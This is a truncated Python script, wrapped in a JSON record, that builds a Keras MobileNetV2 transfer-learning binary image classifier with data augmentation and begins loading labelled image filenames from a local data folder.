{"seq_id":"559763417","text":"from keras.applications.mobilenetv2 import MobileNetV2\nfrom keras import models, layers, optimizers\nfrom keras.preprocessing.image import ImageDataGenerator\nfrom datetime import datetime\nimport time\nimport os\nimport pandas as pd\nfrom sklearn.model_selection import train_test_split\nfrom google.cloud import storage\nimport trainers\nfrom trainers.common import 
TimeHistory\n\nDATA_PATH = os.path.dirname(os.path.realpath(__file__)) + \"/data/\"\nBATCH_SIZE = 20\n\n\nif __name__ == \"__main__\":\n\n # initialize convolutional base\n conv_base = MobileNetV2(\n weights=\"imagenet\",\n input_shape=(224, 224, 3),\n include_top=False, # exclude the densely connected classifier, which sits on top of the convolutional network\n )\n conv_base.trainable = False\n\n # initialize Sequential model and Dense layers\n model = models.Sequential()\n model.add(conv_base)\n model.add(layers.Flatten())\n model.add(layers.Dense(640, activation=\"relu\", input_dim=(7 * 7 * 1280)))\n model.add(layers.Dense(1, activation=\"sigmoid\"))\n\n # initialize image data generators\n\n # augment training data to produce a model capable of handling data variations\n train_datagen = ImageDataGenerator(\n rescale=1.0\n / 255, # rescale pixel values from the 0-255 range to the 0-1 range\n rotation_range=40, # train on variations rotated up to 40 degrees\n width_shift_range=0.2, # train using variations off-center on x-axis by factor of 0.2\n height_shift_range=0.2, # train using variations off-center on y-axis by a factor of 0.2\n shear_range=0.2, # train using variations sheared/warped by a factor of 0.2\n zoom_range=0.2, # train using variations zoomed by a factor of 0.2\n horizontal_flip=True, # x-axis flip\n vertical_flip=True, # y-axis flip\n )\n\n test_datagen = ImageDataGenerator(\n rescale=1.0\n / 255 # rescale pixel values from the 0-255 range to the 0-1 range\n )\n\n # walk through './data/shapes' and load filenames into a dataframe with labels\n # read from fs\n root, dirs, files = next(os.walk(DATA_PATH))\n\n samples_df = pd.DataFrame(\n [\n {\n \"label\": file.split(\"_\")[0], # filename format '